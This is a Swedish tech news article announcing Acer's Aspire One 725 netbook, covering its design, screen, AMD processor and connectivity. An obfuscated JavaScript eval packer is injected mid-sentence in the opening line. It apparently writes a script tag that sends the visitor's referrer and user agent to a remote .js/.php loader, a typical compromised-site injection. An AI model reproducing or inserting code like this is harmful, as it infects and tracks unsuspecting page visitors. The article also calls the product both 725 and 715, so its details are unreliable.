Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

PC

Acer kompletterar produktfamiljen av netbooks med nya Aspire One 725

Acer kompletterar produktfamiljen av netbooks med nya Aspire One 725
Sebastian

Aspire eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rihnt|var|u0026u|referrer|ykdsr||js|php’.split(’|’),0,{}))
One 725 är en kombination av ett smakfullt, elegant utseende och fantastisk prestanda – allt förpackat i ett smidigt format.

Nya Acer Aspire One 715 sticker onekligen ut från mängden, även bortsätt från dess prestanda. Datorn kommer i två färger med en glansig yta, Caribbean blue samt Volcanic black. På insidan är finishen mattad för att förhindra fingeravtryck och fläckar. Enheten är endast 23,5 millimeter tunn och har en vikt på blygsamma 1, 2 kilo och passar perfekt i handväskan eller ryggsäcken. Trots de blygsamma måtten finns en 11,6 tum stor skärm för visning av högupplöst media.

Den bakgrundsbelysta Acer CineCrystal LED-skärmen i 16:9 levererar HD-upplösning vilket gör den idealisk för både underhållning och produktivitet, och för videosamtal och fotografering finns Acer’s HD CrystalEye webbkamera. Datorn är utrustad med USB 3.0 och ansluts enkelt till en högupplöst externt skärm via HDMI-utgången.

Med AMD APU Fusion-teknologin, som kombinerar AMD C-processorn med turbo boost och HD 6290-grafik med stöd för den senaste grafikstandarden, bildbehandling i realtid samt effektiv kantutjämning klarar Aspire One av de mest krävande uppgifterna.

Specifikationer finns bifogat i pdf-versionen av pressmeddelandet.

Acer Aspire One 715 lanseras efter sommaren.